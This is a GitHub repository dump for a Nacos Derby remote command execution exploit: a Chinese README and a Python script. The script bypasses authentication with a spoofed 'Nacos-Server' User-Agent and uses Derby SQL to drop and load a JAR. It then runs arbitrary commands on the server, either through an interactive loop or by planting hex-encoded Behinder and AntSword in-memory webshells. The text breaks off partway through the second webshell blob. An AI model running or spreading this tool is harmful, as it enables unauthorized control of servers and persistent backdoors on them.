├── README.md ├── images ├── 1.png └── 2.png └── nacos_derby_rce.py /README.md: -------------------------------------------------------------------------------- 1 | ## 简介 2 | 3 | Nacos Derby命令执行漏洞利用脚本,默认使用User-Agent绕过漏洞进行利用 4 | 5 | ## 更新日志 6 | 7 | 2025.04.07 增加判断是否为Derby数据库 8 | 9 | 2024.08.13 修复bug 10 | 11 | 2024.07.18 可自定义AccessToken进行利用 12 | 13 | ## 使用 14 | 15 | ![](./images/1.png) 16 | 17 | ![](./images/2.png) 18 | -------------------------------------------------------------------------------- /images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Wileysec/nacos_derby_rce/5c2e1fafdb140fbe5b3a6c70689c2e53df93ebfc/images/1.png -------------------------------------------------------------------------------- /images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Wileysec/nacos_derby_rce/5c2e1fafdb140fbe5b3a6c70689c2e53df93ebfc/images/2.png -------------------------------------------------------------------------------- /nacos_derby_rce.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | from urllib.parse import urljoin 4 | import random 5 | import argparse 6 | 7 | class NacosRCE: 8 | 9 | def __init__(self,target,token=''): 10 | self.removal_url = urljoin(target,'/nacos/v1/cs/ops/data/removal') 11 | self.derby_url = urljoin(target,'/nacos/v1/cs/ops/derby') 12 | self.console_state_url = urljoin(target,'/nacos/v1/console/server/state') 13 | self.access_token = token 14 | self.headers = { 15 | "User-Agent": "Nacos-Server" 16 | } 17 | if self.access_token != '': 18 | self.headers['Accesstoken'] = self.access_token 19 | 20 | def getRandomId(self): 21 | return ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',8)) 22 | 23 | def check_vul(self): 24 | derby_req = requests.get(url=self.derby_url,headers=self.headers) 25 | removal_req = requests.get(url=self.removal_url,headers=self.headers) 26 | if ("caused: Required" in derby_req.text and derby_req.status_code == 500) and ("caused: Request" in removal_req.text and removal_req.status_code == 500) : 27 | return True 28 | else: 29 | return False 30 | 31 | def check_derby(self): 32 | req = requests.get(url=self.derby_url + "?sql=select%20*%20from%20users",headers=self.headers) 33 | if req.json().get("code") == 500 and "The current storage mode is not Derby" in req.json().get("message"): 34 | return False 35 | 36 | def get_console_info(self): 37 | req = requests.get(url=self.console_state_url) 38 | data_json = req.json() 39 | if req.status_code == 200: 40 | if 'startup_mode' not in data_json.keys(): 41 | data_json['startup_mode'] = data_json.get("standalone_mode") 42 | if 'auth_enabled' not in data_json.keys(): 43 | data_json['auth_enabled'] = "Unknown" 44 | return [data_json.get("version"),data_json.get("auth_enabled"),data_json["startup_mode"]] 45 | 46 | def base_info(self): 47 | data = self.get_console_info() 48 | print("[*] Nacos Version: " + data[0] + ", Authentication Required: " + data[1] + ", Startup Mode: " + data[2]) 49 | 50 | def javahex_exploit(self,option): 51 | for i in range(0,sys.maxsize): 52 | if i >= 300: 53 | print("[-] The vulnerability failed to be exploited. Please try to exploit it manually") 54 | sys.exit(1) 55 | self.id = self.getRandomId() 56 | self.option = option 57 | self.jar_filename = "/tmp/tmp" + self.id + ".jar" 58 | self.external_name = self.getExternalName(self.option) 59 | javahex = self.getJavaHex(self.option) 60 | post_sql = """ 61 | CALL SYSCS_UTIL.SYSCS_EXPORT_QUERY_LOBS_TO_EXTFILE('values cast(X''{a1}'' as blob)', '{a2}', ',', '\"', 'UTF-8', '{a3}') 62 | CALL sqlj.install_jar('{a4}', 'NACOS.{a5}', 0) 63 | CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','NACOS.{a6}') 64 | CREATE FUNCTION S_EXAMPLE_{a7}(PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME '{a8}'""".format(a1=javahex,a2=self.jar_filename,a3=self.jar_filename,a4=self.jar_filename,a5=self.id,a6=self.id,a7=self.id,a8=self.external_name) 65 | data = {'file':post_sql} 66 | req = requests.post(url=self.removal_url,files=data,headers=self.headers) 67 | try: 68 | data_json = req.json() 69 | if data_json.get('message',None) is None and data_json.get('data',None) is not None: 70 | print("[+] Execution successful, Vulnerability exists! Function Name: S_EXAMPLE_" + self.id) 71 | break 72 | except requests.exceptions.JSONDecodeError as e: 73 | pass 74 | 75 | if self.option not in ('1','2'): 76 | while True: 77 | cmd = input("Please enter the command you wish to execute (type 'exit' to quit): ") 78 | if cmd == 'exit': 79 | sys.exit(1) 80 | self.execute_cmd(cmd) 81 | else: 82 | self.execute_cmd("whoami") 83 | 84 | def execute_cmd(self,command): 85 | get_sql = """select * from (select count(*) as b, S_EXAMPLE_{id}('{cmd}') as a from config_info) tmp /*ROWS FETCH NEXT*/""".format(id=self.id,cmd=command) 86 | req = requests.get(url=self.derby_url + "?sql=" + get_sql,headers=self.headers) 87 | data_json = req.json() 88 | if req.status_code == 200: 89 | print("[+] Execution result: " + data_json.get("data")[0]['A']) 90 | else: 91 | print("[-] Execution error!") 92 | 93 | def getExternalName(self,option): 94 | if option == '1': 95 | # 冰蝎内存马 96 | return "org.apachegv.SignatureUtils.exec" 97 | elif option == '2': 98 | # AntSword内存马 99 | return "TomcatMemoryShell.ConfigurationUtil.exec" 100 | else: 101 | return "test.poc.Example.exec" 102 | 103 | def getJavaHex(self,option): 104 | if option == '1': 105 | # 冰蝎内存马 106 | return "504b03041400080808004160f258000000000000000000000000140004004d4554412d494e462f4d414e49464553542e4d46feca0000f34dcccb4c4b2d2ed10d4b2d2acecccfb35230d433e0e5f24dccccd375ce492c2eb65228014aeb15e427ebb95624e616e4a4f272f1720100504b07087f64045e3800000037000000504b03040a00000800004160f258000000000000000000000000040000006f72672f504b03040a00000800004160f2580000000000000000000000000d0000006f72672f61706163686567762f504b03041400080808004160f258000000000000000000000000210000006f72672f61706163686567762f5369676e61747572655574696c732e636c6173739d7909801cc775ddafbd66b0185c4b02e48017481124b8b38bb9af250c72eebbe73e6949ec99e9397baeee9e531775903a2debb22c52a22953b220d9724849ce02342c929622d291a3d872144b8962c77102598a1227ce69d212e15f3db38b5d60492a0176baabab7efdfac7fbbfaa7f7ffb95df7f16004ce473fbe0bfc3df29e17f2cc3ff84ffa584ffad84ffa380ffab84bf5f8625786919cec2cbcbd0817fd80f3f839fef8757e0325e08601f21f432a720f30ab2b00c47e0650559549225daab50c0a3cb701d512ac93e64449695643fed5729c901257c44410e2ec3ade4d07e72187e4e5b477021b2b20c763ae33a5c8b5caf2447298763b4f30625b95149d44a725c09ef56909b96619ddc4c476fa1a3b752ceb72d83959ca08fb7d3c73be8e50df472a7829c54c2e715e42e057c6e1fb99b9ca244f72c9355a25190b565ec59a70fa715444be9754aa2a77783921815f0d4323111336a472cf4825259e9dd462f767ad950927b29c3334af24bf47e5649ee5392fb157049491c0ae25c860c358c6b1972c4ad209e6528102fbdf87084f8e92540970b2e9310d1d0cb11ca26ac20117a6796a144dd6027512aa4921a33465b7105492c43035e5290e432f0248536a10f69eaad97092c7023ae44e0ae53e1063b60b53cdbae6a9392506f57efbde7da2ea47775ca1c8143e17a9b63faad2227a4d8228f3d2be14e89e533ac50a7cfb3cef952ab4c87f660a4aa72928b674591615b4879fda9bd97936a7591c02de18e50d5b25db654e3aa036db25e6db3525fe0d2529d1791ec103273b22267314d6722f03ca312d795ea9db6a82019024b67eaedba7416453a750f3e2af9ba28716d4ed82d5db4d8e04a123254943a6d891b4948396ba11487a7947d5c541bc6f948776cb7d6e3ee96e6775e457be6da55cee2fc0349892d35236c579e866e5190ac82e4305850056aa12d3156b6ecb373f58526373650116b75be2c706d02d7ed20f2b3620d3923dd3cd211d8bf45869d6810a92670ec55de49c97d3883a00a47770c6c5b93da663a130d72dd03d7cec558c1f8c6c855903c817ddbaea218bb5a855731ca7e543cbced9f5dd09c51ddb397cff695787632718e255c6bee0127f229731584a98c3202c777cc11b80a8f93b4114eaa75a8be8bf25c02477610c9f3a83825da0877d83215e786ab29a603a8f749cc0c48cd96cb5784bf7b0fe1f7500711a9e8c8edabad7a45bb2dc422c53e5610d8315d65db4bb24d1d5bdd48bf5c17036d3a972bbfae185b015f40c7d7f117406072833abf1d9f98ea317963d096b912c6ff34d410fd7b650d6af9199d3033bd62f6882d844347a022ed2b6ec52b06ffd5363db37a160d8ae21cac4eea5d37ce6e75058eb25a3af580535ee2e0561f5776b3128b20eff4d11cb74d59d53b5a0a04d920d1bed4ed4bb810c7b6d03073758c935baf250bb477522df5db74e96d86b27db143eb2b0462579116fb950a558eb43191630ec7f48d8842107bd1afb65fccf47bb97c1e218186aad439be3ccd928b729b807a0f2c7be9104d0a746102f7fd3faf7b35a3133bc6984eb25faac923575201dd2b4904bd5d6f0f3a4d6e1a4cf828b102ca305d1381d892fba70abcf11792ea816ba2708f90d8d3648ae96208949b1e78ad789fe3306fde7e8d82d3f19dc9ee8e1d34019ee7aa2cef289510763b8996bbacc0b65cd314b272adf4e8389902b1d29a19699fc4b5baf2a8823ca080bfc26d1a7768cce5674afc6ca75a4e76fa4289f3d6e97e72ddee3def345d42417e5905df226fc4fdaf2e87fa09b12fcb76bb82bc4945de4c1e2490bdf4c8c3977ef7533ff9d2977ff4b52f5e7af8b77ef4be8f5cfac0136b979e7ae46f3efbce8d13dede84ad71dce4c4a5cf3c7de9f187364e68db6ca9236a574f9cf8f153e77ff495775dfafcef6d9c488b9cb0eea8726d69e344b25ae1fb0ddc61d74ab5d3bd8e789aef548bb8879d76144549604b52849570971632ede164dcbd92090f5fed65b2ffc77e9318706cfd0b66725c6694d68f729a702336acb53cba52c6e14995a39d74d693f7b9d37d17c33be2f96a245d2a579bc186cec6e59d1d4d2ca2614c452f33c83342aecbf70a569d3151694a018324a50deeba90f185fbcd54a5c41b2b9c9dad485aadae9db25aad469fcf911fc5cc1a5bd46cb59bad93762eaa15ed43eb44ab350eeb698745eb1d548b0e83dfdd4a32f558d0ceb81cbd9a2124392c79bee7ed65f8a45ef2f9cb168fae1c4b59584b1afbbbd6a43b9e71e523bcb39c4e324126974efb12c57423c7588538cbeb44ae5a18f03ac117e825c446b26c088d82a351c3686af6cc83acd753efc6999654cfa45c7ddee848eb07b990c65de63b56c12195f5417dd092d21687559f55ccc4b964dbc11bba93b4dec08aacabd29652ed9e64cac7bb3aa661d76a1b9ca7e370b547762eec4ce43392542e3b4b92aed6aab992e3725e6f70e55c7667a8de3426dcc19ec63ee8b95a9962df9dafa6997025c83b12fa21670ee5fa9ce84c0d2cdd9ee4f13818bed9ce9be3e19c6f68ae18b4fca0eba9e8fb11073bb21bcc2d9faea2cb44b3d65c8f8fe624679e49ebd920d3d31b4c39879989374ded86ae1de6f950451a4de2f6fc38970cc5d3423fe7c9a5278c2fa2cf5bc4ba2111e0188f2dd1b2b4d2ad762ac0767551be36b6753dd1413b6030969a3d369befb79ac96cdfd5ea1732a22bdeb5eaaa117f81b5e68556564ab803c94c2a921c3106c790e99ac3e5be4bef6d8ec29348c8574d6473a32857add61ae5aca198119c9c29c20a567dce198e07c285d628354c16a2a3e4b815b56a4b1c5fd575bde22496f4c5a45c26d748755342952f6ab3358f68726ab3c14ac1c862f2684afd503f3f1aebeacd5abd660d194c4262c8e7c5685aa76fb5c2662d33aeb546e548256dd5657ace72c1ad37051bbd4c8129c4f26ec9dd1a5a45ab399eb479a2856e349be2f95e40cc25b3294ba310286702e3bcb1298575bc20d81db9542ddcb059c44cb4cab6ea21b3c3d4a8a41ab171d46ab6d9bdb56ed7658a562286aaab66d1c610317cb033b2391953373b1907359951d52f8e6ad660323f19b586dd51d7d0891a0c3ecdc8845889256bed418b1b97c3f66ebf6d1d1807d54ec85c081799b6a5558839cb2ebf3691cb37fca64a66d01ff2a2ae6bb145dcc550a420754d8e8cabe42b7aab1a9f10700f879d9e476ad6f5ed8ebb8ede1b7af2119da8cddabbd5d8d0604da13318175f9f7893c96ec890614362a4957697dbf65ad2c0c75dc96874e20f14dcc58ccd148fb8a3969138c9ba1923dbcb6b7d9a50ba3a341be369a6dfe9a698c1209cd16bb33aa7cfede4ab7c2dea1e9beb7d2f67b0d73cda46dfd1c1137a37e8c95afd1e3ea5b7067dc35a8fd105aa52b42334745d7b6ea2ab956aa3b4d73de944fb6e8356140af981d126e5fa15bfab38e61aeca89a2e798a4e67216a690cda8da69b290653b66625e18ba19cc9e228d86d85f8b4c56b353aba65a6d7ca263d1556ec44ddfd9edfdf4ee57a834466d01cb54dae40bfd50f8c5d098d212a88457e981c0ffbe142a75cb4a5acda70c39fab1be33ea783a9e4189fb522b4da064c8fd9b01898f838ad4763e126564331d5b0e4cd9e64d3384ed65db1b4d0363952c37ebfa2af3a3c523c584a6b269151d092c6437f8b6bf9b54d9b765cd504db6d5334eccd8f5b42928f96274d76c40fb4d566ac9eeb564c216f6ba2cd85bce690a5d1b598c70643a0a7eb5b6df17cacced8b5bd49d1583066daedb8d81bea8dc158a259613a234d2d9e2aa6e37aa669e0b8762c2c35ea498ba16028d8b996682d72be547e9861d9a02fd6ad361b8184cf66c99843be712f52cf14b866295bed8ed1d3c9a1a5daca70ac2f961cc4231eeda46d685aaafe88296c6126558ecb5983b942c367ee248ba2bb92ce65874dbe147634728d48d736ead8537dcfa89cb696594c3b863457ea67c352c5c54f9c19ad2e3fb257f2b5788d2bb983652155d6386cf6e0286b1bdb07a996c6ef2b34734583afcb18db8170b1611d3b6cbeb0cfec6627bd52d1edca3042d1d767a4b4ad35e0fc6ebba93a6af90b311dc24674a70a6ea3c5e1d775a21531ce96fa432bcf35dc29f3d8d5e80bd952b0271af54d8f60b4657382c714755475f64ccc960a0a967edaadcf7903a18ad8ac277b099faec3996a16bd771c1d6b136db3b651d69a6cc9812dd3f4e90d63b1684efb73065fdee8aa693526e7185f71c29a44588c3a52565b2d2108922dee6f69c2a346a1cf323d5ba51e29f92bb16a91e1acb57e598847c594d08a6bb501c630ea94bc4d7bdf15776bb51e578dad787549670d77d5e260cc073429fb2861311a2cd158d124d8c3d1722e3a497b46966cad9419e65c03ab3d1c4ec46d91eca4ef8aa4b54cb9500e4e6ae96adb5689f42cdd5abd970ee842038c18266f0a17fd6e0de377d4ca7a6f72ccb37e8bc88d38bf35624e27cdc3122b960689522ad632b83cbeba4b6a46729554b1eff17433094bcf6e4f547c6289e96a9961a15808333a833b24dadd782c0e4871a3de254d3af19661cc706d5b2b1e0ae8cb916ac269718dc65a67b0940c25e38d91d39d4e0b74abb4f8f98854f00e2dbe76a95436175d52ad94d2e9ed255fae511b5bfcb672a3537198ca83ac6762880ee261c6e810f47693bd91cb79bb299f30ce35b565b318d00c9c23612c682b398ed11b8b5a67a6c6f8a3795bdd9d8f064a3a51cf33d92cef993492414b793276e453a6493d3b3488ad3413c88dfbbe9a9f31d91a4225cd07d2017c5d77fa194b6a6888982baebabfa1490deb0521e90f5a4b78bc499a8500da6b101dfbc4b8c61ef7641a1e73181348c2a4659271aee1601263a613b7e85d515724cc56ab950a9be84f9a99b126a68b7bc5b8b367cc0792c64eba1cb0baf9502ae666cb098f94607aa1c2081348b6d51ef8b86a235f3536adcd80bf9ecbb1865adb35b2fab29230f40c32ce6cb555cb8443ac596b098dadba98575373e2aed637714396f36a5aad54c01b8c77582f3b4a891ebf33d1c9fa6af960466bf2764c6367636c157b6db3a6d5a88f63995cd1149d341b423ee195dc669375c2dbc2edbaa3611be43d4ebd3b95d6da2597bd221a4b11ffc0e24dd9fbe641bc1eae177d9e58cf90b6c59259e748db0e729db031a0f71413c1842f1fe56a7d5730a8f76786b1713ec0845c8596ddedee962d23deac89548625472d62d2974a75aec2164437e7174c5cd71632a6ec3e9b33d4e5ed5dfd44c3981d5ed1df30a74d7ed1ca397b5e7b65d01113d16e3b6ef44cbaa1629b4de8ca8648b233197306439fb18762ecc0acf5f3daaad06f26069d468ae94a4c34820ef6942cf54a273910c78981ad31642256b619771bcd465db0de098e9cc9b2d51b1cf6dcba71232556c38df0a0c08f6a9e7eb99d30c52a3153a99228c51c5eab2e5bb2c6229e28e243eb0a47c2d198b19e32c76229bbb63c6a69275a4db9512d6a930ec3d86628c59864558c062dd54c386aacf1439b373611caa1386bd50f4d65c1d0ef68b994a1d88b84ab7eab869bb4ad7e7dd334741bb989dd8c87bd9639c7f679b7cfdfee97fb496b23c90a76739fb1388ae648253cc9189ae1d8c0c0a4b52d51eb48e72639736b1cd68db3d17124c906aa39ad635419746bfa9ca7ea70a8e01de441bcc0432af815f8b082645584254505c9a948899455842315157c167e53055f86dfc5979d3d0a4f5bbdbb0b1dbbde2b52b38a162d9c4ddba20a7e08df55912a8c09dc4c8b696c1ddf469cf8be52153afd76392674e80b534750911a2d7d2c4ddf5d55f0a7f05db9465617efd41138724d554d451aa4a920bc8ab4506cd2261d7c0b4b4a6cbbcc0ae559d54e45baa447e068aad32ab192a755e4ca65eecaa040441591a864ea18be1de2cb259fe58a6cb7ebda596fba6df7ec3d28f6099c28bf29d222d7156b24fa6da9dee2b60d489dd057910119aac8089786118c55644c262af2166afeb7e223fc3e5c54c137e09b28f59e652e54f2aa7e0579ab8abc0dcea9c8dbc93bf05d56451e22efdce596e9cbb98abc8bbc5b45de431edee55ff45367486b9f2af81afc1ebeb6b3e5b2a3dbe5eba8330aed19e04be7d64b2475e65fa21fd141af4682e23ca222ef25efa3dabe1f69c5d7a055910f900faac887c8afa017c987091c13fbedd3adba583aed74243d16937b5ab652915f25932bc52fb9daa3221f21ef98a9799a02e3f456518ca2cfbd55ef5a9ace2170cb6b96a550d0d7aa4751653ebac5e3d52a5194e8632af271f20915f935f24915f975f22915fc397c5f411e5591c7c8a709dcfada051d15f90ce9a8c8e3e43754e409d25391cf92df4400be4e9184c089d72b91a8c89314e637bd46117f0b146881407407ef83bb2bc60456ae7404244e60a50e9a59736da927d01e74a64e4fc921bdb7bcd30a6747f2d264b083e4c657ab1ded2e648c1149aded1a2cca1e13eaed2b95c1ebf6e826a0e8d2271e5739ba57fd947e9da86f6b766c57d17c4b635ae9aab122237f1a983f450bb70b6df961f777942b7531b4c0b402277fcfc02c484b643b97c7f39f90e47a7dae5de2e44af052931b27396479649708d845bf5becea4019aaf4aadcfaa683aaef9263ab0c368fd17d95da5bd53c5cf1e8950f1ebb528efa5a5eb3a23b2e2975b63ef9dcb893ed765e910d7aa0d417040cfdad1d62b795b6bf7a1cdc927f3bb5f2d8986974f2753e916d7f2e6873c3405bc4ada0c46ded1cd3d840cdaa94eb422a1ff3e0d03451f0acc095b7c075ff1e8b5c5b4fdcab6abb5dda3c40539e1c7f75f94bd4c2a982fc7d61c0f27d2e5aa1900aec6430138b16b2a7755c02f63d1cf48b56600f5fb54bd39a3d2b4e63f7e4a957e7b2f3bb96fad48e3e5787a70ad24aabac87d491f95218ddb3e7979205b13ee1e4b00850a2c0de0151e908d380d8876ed832ff22fdba90b902259a8d76d4fae9d0c214413225f25f1c0a75fac14981cf810025d82f75b67338b5befcb5e2865729b3a3bd76a060d6b5fe3a48bbba507f005924fb5d4e284d91ba720db0e827d4ddd6ba06364b18fb2ccdc31496f43cd2e230d9d02f9aa21c2f7b55b59765d389225be5e076e8c059a0ff0ec13ee8810004447cb2c31cb600f67f15c8cadc26ccaf2c3c8d8f7320e17519ef38044a50411f5baa29290c608877428f283336eb78a763f32b8b57a62fc95d87764c9d8709bc459e8ac719a4a2534dd84bc7962fc2527e45711e945773b86e0787e51987b7e16f017bde8e3f3cb8cec4f81ef25ac4bb65f53cec5bdd84e5b0e619d84f20b2f60ca8083c0a3761e300016675fd3c1cdc58585d572f6cc2a17397fffa1c2c84bf825c16408f121dc63b5dff0e541de0183edd885653c309380e77c34d701a6e46ba5bc10cb7c9b2ad22c5dda08077c2bbb075020ec2bbb1358f734ec17be0615972cb4cf24766ba4cc7de8badf761cf7158b88ccbce2be0fd0af880023e08f0129c702ae043d45a782a476ea8e1dc0ff07e10bbc617e148fe3cac8457ae5bb9fe021c7d1e8ee15f84306b1b0bea85672d8bf396a5a34b47179f240ef5c2d125c38642add8841b566edc04f5a3f0b5f517e129b562e5f805b869e5667ab9052fcfc3ad1b4ab572136e7b064e10d8d8a7de3733db43b48576db58562bd5cb9b70fb36fd7ef5fe6d7a955a35a38fd016a53fa0deaf3e80f4ccfa0b707c7d13eed88437acdc29cbb05fb3fe0c9c9c83eccea1bb760f9dbbfcd4b9cb6f3d07432afcdd2f4047becbb4a756ee41dac7e0d8ceae55797a40ee5ad150bdd6f0f2ffb9f87b96c8b9579e3d078736162ec27a5ebd701e4e3fa7791add7123be8d34b741222018a650790342e54e84ca5d088ebbc1890ecec13d182babe8620d9c8335780a23e51b089f6f830efe02a92e81117e8c80fb2942e96fc1426e062b59031bb90fecc407f792029c2145b88bd4c0852b3af06dc64986e0964157c160388741fdab08b503b8c283f011f82846e710c3fb63d8b78cab7f1cff7f1425d3133d7c027e0d14c861193e09bf8eb2238866905492de0ca6c748093e850e9c431dd91988b7003ba5da026c140e5e4685155b803da680c7f04a10eaafc0fd0af8b4023e83307e05b4f2006dff0cccd87e198eff3dccbd047373ebab727b91a27cbf1cd14a5c8e87063c0ebf21e78027f087ef9dd3e8263ce6031a8fef25910ba045173308e3fd1ad97b3a661d9dafdf04c3261823e7a08cc1bd09a60b60be00968dc515eb8a6de9eb60cfcfaf6c24f30b5f857b93f9457add84331b4bea25cc02bfa45e5a4792b3f979f52292cc5f80fb9046bdf82c6d6cc2fdcf837d1a4494fde2c6e2dad328dc514cac772212eec214f46e70a0f814111b3444c18fe3010cf3207a2784940cd2e6913a86d4093040125b29c8401abd90c1f939f44041f66c02d53420fd93f0394c6731c4cae7e1b750f909febe803e572087376f79113d32f5226d518f115cf7613915cde1ea6f872fc297502eea330d2cfc1c8ecafef86d068d7e19de048bb2031f9b76d2744314f03b2fcbe91c5ff6a7399a1cc32515c8a0bbaa599b06cb26381f8585af68565c0b53b39e4d2ec8c65b4b5e0077f61cf818cd8a474e4c5efca349e902f8361669da522f9e073fb53af20a64352bc1190bef8c857a691342321b9a910f631869686a944d7b1a010e28f62134c06128e2580347cb185a1c9abd822ea842186a68dc3aee784dd99c7e947d0303ec9f60f82d20c569781a0db488746f80afc057d1a86be092cd394f75dc366777664eda9a9af37df20e347fb88086fa079cb3b50b1dc61fbe1fcf76b4bf433ed45a819d1660d6a9fe0bb2fe0b54ff6986562f6e42f849b84dbd7814b58e4c8dbb2627a2c5852fd31474f92fe6bf2c6f9d5736a43622aa83db6217b7a01eaa2fc07db8b003db3edc9bb754be1d51f24f6113d54351b6950a6c2b1580f3982be690d719d934f3c8d1229b6601f96a64d32cca2a9f80f9cbc84eb105950b0af0ca41ff0cf2b9ed65a4ba6208252d52cc60338f6b5384b656980b100d6b5662334f2f6140c531708d5387af4ee36b03ff9e0eaf249036b2b6929c47dae7218594049b679184a1997a25bd93c9fab51c64e55665cc4c13f471d9046fc1eb5bb1f7ede8ed7760783d84467aa76c2c132ab00427e10f30b4088edc2bb7e670fc247c5d4e816b68dc67111f94730b9e938f3f8fc82783b9d9cce7b7673e3fc3099e5d9a349ede26636601fe50ce6b3c86e437e09b33a47c0ffba96c672f420677f36cf822e4f27876c9472e4221bf761e1e608e10f803e5c6827c50f9e5bc65f1d37048a35e983f8ab879e3b9cb3f4523bee9e96d78dc2ae3ee1174c27be1084a711cde8f7efb206e3a1fc293de87656dcf4e57847f86c985665c0b7c0b5e40e98f20d58bf04728d9714c52ff1cb7a8799c7b0bfc31d22da03daf877f81609a02e26698a380c0dcb1a180ef28e05f2ae04f688cc1cfe006b2e36ca6a485ba99ae59bcd3f83ab28a1bf39b236ba8cf836b98a3d92bc7bd8332c1c750c08f63987f4216f7c47412fc193a02e4d6bf42f3e3811829be07ff1a67eec4de9fc3f767cbbd88f328f64ee1127744d65e00f51adaaac8acd375d79f6630c6ca9173977f72114a79cd79e09e938f6447d1a5a5196ceec267c0dd7011f7c37d807687cfa0111e478a27e006dc966ec68de936cccc5b103a84c6a712cde3a812d3c90f64c94f6d4b7e6a26f922a69d2fc800dbda59a73d5bc03900f33fa3a6fd373105fc5be5b67a2564f0c36d6b3ab18f1ece0fae6a689cd000c18479f5c9f98bb270c7a694f0ef66821cc4a30715646bc76d202a1fc783ca0fe12fa7dce78ecb675780efacfe21d81f85e555dcfc70dba1a6dc58201b8bea054cdf8b2f4255bdf40214d75e0417cdd9950dc5bc457954a9563cfb249c562b8e2a7133aea2d56b8f827af6587ff6313820b73716cfc1bef72831c1fd299eb1d44b9a3539d8cf60ffe52fe04e8b0ccb1b4be72e3f4617525d84067553f339f522ddaba7721d572f124c09f73fbda1904f68b839b7ce431b6956f7ea46a54ea24146a8f013b2077804f4d731b0f959f8b4f1680fb8ed5d8f1bdf0d98136fc2ac7812f3e03d98097598e0efc5149fc19cfa469cf7203e57e019dc662e22cfe791ebb398639fc394f23c9e92be8181f74d44f2b7103f2fe06a7f84ab7d1bf7e13fc6997f8294df45aa3f939d33410418f13fcdd44a5cc502ff1efe0a9134c1df7f80bfc6eb9710119f84ff88ade7b75be89a6d5c7d67e64edafa4f78a29c935b3f9233faf52821d57401f5d984bfc153c4226af5553c739e438850b469e1e0411782ed1550e255013fc1ebcfe10605fc67b2f6122cceedc7d3d94ff71f4829e0bf1cf4e165076a683653c27fdd7efb3a292f0db0ef2274309b7571fba62f2f57de24bf8fe43fc09ebf9561fadffe11504b07080ac6eb97031d0000bf2e0000504b03040a00000800004160f258000000000000000000000000090000004d4554412d494e462f504b010214001400080808004160f2587f64045e38000000370000001400040000000000000000000000000000004d4554412d494e462f4d414e49464553542e4d46feca0000504b01020a000a00000800004160f25800000000000000000000000004000000000000000000000000007e0000006f72672f504b01020a000a00000800004160f2580000000000000000000000000d00000000000000000000000000a00000006f72672f61706163686567762f504b010214001400080808004160f2580ac6eb97031d0000bf2e00002100000000000000000000000000cb0000006f72672f61706163686567762f5369676e61747572655574696c732e636c617373504b01020a000a00000800004160f25800000000000000000000000009000000000000000000000000001d1e00004d4554412d494e462f504b0506000000000500050039010000441e00000000" 107 | elif option == '2': 108 | # AntSword内存马 109 | return "504b0304140008080800a3adf058000000000000000000000000140004004d4554412d494e462f4d414e49464553542e4d46feca0000f34dcccb4c4b2d2ed10d4b2d2acecccfb35230d433e0e5f24dccccd375ce492c2eb65228014aeb15e427ebb95624e616e4a4f272f1720100504b07087f64045e3800000037000000504b03040a0000080000a3adf058000000000000000000000000090000004d4554412d494e462f504b03040a0000080000a3adf05800000000000000000000000012000000546f6d6361744d656d6f72795368656c6c2f504b0304140008080800a3adf05800000000000000000000000029000000546f6d6361744d656d6f72795368656c6c2f436f6e66696775726174696f6e5574696c2e636c6173739d7909805bd579ee7f66bb1a8d6c63810d3218cc6eac198f46db8c0630681969345a47bb4416aea42be96ad7d5d59ab01628599a8d6c9026a404322125c106323671629c0db2d12669daa4db6b9b06429af7f2fa96b6094df0fbcf95349bc7401f78ee3df79cfffce75fbf73ceafefbef6e55300a0273f1d27bbc87932b25b4e94e47c19b94046f6c8c85e865c282317c981212a391c21fbe47037b978825c42f64f904bc965f47180f65d4e1f5730e44a865c250725d9c790ab65e41ada7b2d035f90c305e4a08c5c47191d921135ed9f949129193cca90c372b88c4c4f100dd94f5b337421ad1c4c74868eaea5971103e560a49db33232272326199997c1c71872bd1c0e931be8e88d74f408e57c931c66c9cdb465a60f0b7d58196293c109862c30707c9cd88983922fca89932c31c425c71e37fdf0d06e2f437c32e2a7d22ed347807208d2474846c2f41d919128a58cc9485c461232720bfd7a8b8cbc5546de26236f97915b6584959124254ec9489a0e7332929191ac8ce4e484274bf49197c18b0c294cc0db49510ebb494946ca3252a1d45519a9c988c0906119a9334494034fcdda9043813419d2924389b4e9a34347baf4f10ebada3be5e436cafc366a4913b99d2177d0f79d726852279ac85d54cf8354afbb69eb0f18728f1c6e232a86dc2b873bc87dd4a2f8f18794d93e02235c9b4b11b8e6a03bcf36d9e9225bce4e0745812f67afbfeeec2ea4b756d21c815d6ebecc791ba5242784d864117b94ee4a8a2d465881a7dffdcee154294d87b661b423cb8961a1e867459113ca042e38b8fd7a628eaf13b8da1daa9452ace8e14a15a113cc71c5e2b4b552cef0d986c08a7ca51c16f922922b90abb5c8d6eb5eb644c5c44f0b5be78cfa1e4302f285768aabd21968f5fb098cddc09779f1088a7af0ba087e66f822cab359665f32cfa544e4cea42a65916b8b0464fd168a765e8fb281024cbbf93aa5dbbbd9169deac01e576da1bde1ec558e50db04453655f0b055691a3a8b21ef62c8bb31015101aae1400ce5c0681b571f29701d2d1531c717d30287b63d7f03d1225bcf2167a41b463a02130332ec44fdc59cc0b15b7c1692fa70064115f66c1858b325b54d6f261ae4fc5bce9e8b4988988168c090f710180ff2d9322b36048e46de5615ce61947154dcdef7cea670edd35cb79dc7c65345b6dbb574445c69e8160baa9be63218ba528c10d8b7618ec0658a3869dac389b90ad576549a4b60f7062269def5d46ab4e1aeb0692ace855b297a03a8b50db1a617eb3dd17b61a9401ad156119de534d746b33a7b820ea2769c4da7079a5ebb8da6dbe88ea13bde0b5d1b97596b4b2e1de274f48111a1c0a0ad8b422325560454fec02ddb686f5d27a1e9d4e3d3cb34d463e3679da2c0bae77a31b51373942df26576609a5dfd29ebdac9331b2c71e51bc870c3a12368c50b19f81e43decb903f426fd0f8dfb2886a13766cf4001a974735d25c0a61ab8704989edb811d0d8e3e9dd08f0ea6ff892d8cd78ac0615e8c2707708290b575512a2dda20dbe5ab369c5aaa0a1ce53376f0168bc47fe7a08f4bdb50054cc14a03b3f8b21e1fbe324d03d52c086cc7d710ab0d1157e1d812b21ce2318b2f3d9bcc59de4835d628d3a5d7184a7ec18e6947c2e9df429a6c6432543352c6cd07f71ddc7230e2699c6228cdbd7ed06db33fac25dc70259997e28f2ba67b2e1e95dae8a46d3c6da74314b2e8c2046efa2fafbb95d1810d63de4ab091